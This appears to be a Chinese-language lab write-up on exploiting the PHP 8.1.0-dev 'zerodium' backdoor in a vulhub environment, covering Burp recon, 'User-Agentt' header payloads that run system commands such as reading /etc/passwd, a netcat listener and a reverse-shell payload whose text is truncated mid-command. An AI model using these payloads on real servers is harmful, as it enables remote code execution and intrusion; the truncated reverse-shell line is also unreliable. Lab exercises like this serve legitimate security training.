PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞

PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。

影响版本:PHP 8.1.0-dev

  • 配置环境:

    靶机:centos8

    攻击机:kali

    其他:vulhub -->php–>8.1-bPHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

    1. 访问http://192.168.0.118:8080

      访问8080时显示如下hello world界面
      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
      查看源码,检查元素没有发现有用信息,用burp抓包试试

    2. burp抓包

      burp抓包,发送至Repeater,Go一下,返回包中有 X-Powered-By: PHP/8.1.0-dev,得到了php版本号

      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
    3. 查找漏洞

      百度一下 PHP/8.1.0漏洞,找到PHP-8.1.0-dev 后门命令执行漏洞
      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

    漏洞利用

    1. POC验证

      User-Agentt: zerodiumvar_dump(2*3); //或者User-Agentt: zerodiumsystem(“cat /etc/passwd”);
      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

    2. 监听

      nc -lvp 192.168.0.118:8080

    3. 反弹shell

      User-Agentt: zerodiumsystem(“bash -c ‘exec bash -i >& /dev/PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
      反弹成功
      PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)

  • 版权声明:玥玥 发表于 2021-07-29 19:42:46。
    转载请注明:PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub) | 女黑客导航